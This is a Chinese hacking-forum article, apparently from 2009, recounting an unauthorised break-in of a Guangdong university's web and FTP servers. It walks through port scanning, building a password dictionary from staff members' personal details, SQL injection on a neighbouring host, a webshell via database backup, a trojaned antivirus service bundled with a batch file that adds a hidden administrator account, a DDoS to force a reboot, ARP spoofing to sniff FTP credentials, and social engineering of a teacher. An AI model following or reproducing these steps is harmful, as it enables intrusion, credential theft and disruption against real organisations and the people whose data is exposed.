首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
入侵检测广东某大学网站
来源:www.vfcocus.net 作者:vfocus 发布时间:2009-05-19  


入侵检测广东某大学网站
最近受PPMM在一顿麦当劳利诱下,让我测试一下她们学校的网站安全怎么样,本以为能像我们学校一样十来分钟就能搞定,就答应了,没想到……下面开始,为了不引起不必要的麻烦,去除敏感信息。

C:\>ping www.*****.com
Pinging www.*****.com [218.**.96.39] with 32 bytes of data:
Reply from 218.**.96.39: bytes=32 time=687ms TTL=107

拿X-Scan-v3.2扫了一下,没有什么系统漏洞,网站开了21、80、1433,去网站上收集了点站长和老师们的一些信息,PPMM看我不是找人家的邮箱就QQ号、网名,MM听我说要这些信息要作个字典,她也提供的管理网站的老师一些个人资料如:工资多少、婚否、有几个女朋友、家有只大花猫,#¥%…#%#¥。收集完后手工做个字典,挂字典在次扫描,看看能不能扫个弱口令出来,那样会方便很多的,汗~~一个也没扫出来,省略N百字失败的测试结果。OK我们现在总结一下得到的资料,站网栏目很多ASP的,但不能注入、有一个留言簿但没猜出数据库,并字符过滤的也很严格、FTP版本未知、一个下载系统,好像是自己写的、整体是ASP+MSSQL+WINDOWS2000架设的网站。看样今天运气真的不错,对MM说:“服务器安全”,高兴ing收工。那知只见MM原形毕露“今天你要是不把服务器搞的不安全你就很不安全……”,怕怕了继续。

服务器我是没办法了,看看同网段有没脆弱主机,说不定能够嗅探出目标服务器的一些敏感信息呢!Tracert一下看看网关路由信息,拿SuperScan 3.0扫描218.**.96.39/24网段的IP,只扫21、80、1433端口,如图1。


 
呵呵好多啊!随便找个IP,拿老兵的“虚拟站点查询工具”看一下125个站点,用明小子的WEB综合检测程序,批量扫描注入点。


 
一只烟后结果出来了,存在注入的网站N多(N<10)如图3,

 

同时用SuperScan扫描这个主机开放的端口,服务器除了开了以上端口外还有3389。好就这台了^Q^,随随便便拿一条可注入的连接来测试,等待中……又是一只烟,结果终于出来了图4。

 
 
Username内容:henry2006、password内容:12142006、管理员登录地址http://www.*****.com/admin/admin_m.asp 。后台不算大,但有数据库备份就足够了。为一个企业发一张加密后“图片”的广告,在备份成asp。登录后执行net start,不行看样他是限制了CMD.EXE的执行权限,转来转去,除C盘外别的盘符都可以是everyone完全控制,在D盘看到了这个目标D:\ rising\rav\,呵呵这不是我们可爱的瑞星吗!但是还没什么太高兴,因为如果替换这个服务来提升权限,须要服务器重新启动,偶一向心急看看有没有别的先。在小马里输入c:\winnt\system32\inetsrv\data\看看能跳到这个目录里,默认这个目录任何人都有完全控制权限。如图5,

[img][/img]路径错误或者盘空或者没有权限的访问!在来看下SERV-U默认的安装目录,结果也失败了……省略N次测试。只好利用瑞星这个服务来提升权限。先将CCenter.exe放到WEB目录下载到本地机器上,建个批处理文件添加以下语句:
@echo off
net user destiny 123%&$%FSDFh /add
net localgroup administrators destiny /add
然后拿出文件捆绑机,把下载的CCenter.exe和批处理文件、一个小后门合并后上传,将对方的CCenter.exe替换成自己的CCenter。现在只需要等对方的机器重启,我们的批处理文件和后门文就可以运行了!由于Windows系统的不稳定,主机在几天就会重启一次。本人黑站的时候很小心的,并且对主机DDOS也会打草惊蛇的,可偷眼一看站在边上的MM不知什么时候把我用来装饰的拳击手套带上了,我也没敢要求她在等上几天。还好我的肉鸡比较强壮,只好D服务器了,出去买包烟的时间服务器就挂了。

3389登录后我们须要传两个软件,在自己机器上开个FTP把winpcap、arpspoof传到服务器上。winpcap嗅探所用到的一个驱动程序、arpspoof是ARP欺骗的一个小工具,最近经过一位大牛修改功能又强大了、出错机率也更少了。

ARP欺骗这个技术已是古董级的,网上资料也很多,我只简单的说一下ARP欺骗的运行原理,我们刚刚tracert出的网关为218.**.96.254,目标主机是218.**.96.39,所以我们就只要欺骗218.**.96.254和218.**.96.39就可以了。也就是说告诉218.**.96.254,218.**.96.39的MAC地址是我自己(218.**.96.45);然后再告诉218.**.96.39, 218.**.96.254的MAC地址是自己(218.**.96.45)。这样以来所有的数据包都会发到218.**.96.45,并且由218.**.96.45实现转发。

基本语法是:
ArpSpoof [Spoof IP1] [Spoof IP2] [Own IP]
其中Spoof IP1和IP2是想要进行欺骗和嗅探的IP地址,Own IP是自己的IP地址,需要注意的是这三个IP必须是在同一个网段内没有跨越路由器。
  arpspoof.exe 218.**.96.254 218.**.96.39 218.**.96.45 21 c: \boot.txt
这个时候只有一件事要作的了,那就是等管理员用FTP登录……,在命令行运行很容易被管理员发现,但MM说他有办法让管理员10分钟登录,她说这叫“暗渡陈仓+苦肉计”,我看多说算个“美人计”。不知道她给老师打电话时说了什么,反正在半个小时左右得到了FTP的一个账号,这个权限很大,想提升以不是什么难事。当要继续提升权限的时候鼠标已经不在我手里了,此时MM正在拿我的“劳动成果”在炫耀。

后记:不到20分钟二台服务器的权限在MM炫耀声中消失。这次入侵没有用到什么新的技术,只是一些工具的组合,嗅探也是几年前的技术,而且这种嗅探很简单,没有在三层交换网络或跨路由进行嗅探,在跨路由的嗅探成功的概率也很低(对于小菜我),现在还不到十分之一的概率,希望此文可以做抛砖引玉作用。


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·Comersus Cart 购物系统漏洞分析
·帝国备份王拿shell
·一次入侵+社工利用的过程
·ECSHOP后台拿shell超简单版
·再说两种ecshop后台拿shell的方
·一次基于CSRF下的攻击
·基于SQL触发器的服务器后门
·Linux 入侵踪迹隐藏攻略
·通过SQL SERVER远程上传文件的实
·教你入侵RedHat Linux
·跨站脚本XSS
·拿下PHPBB.com的过程(老外写的
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved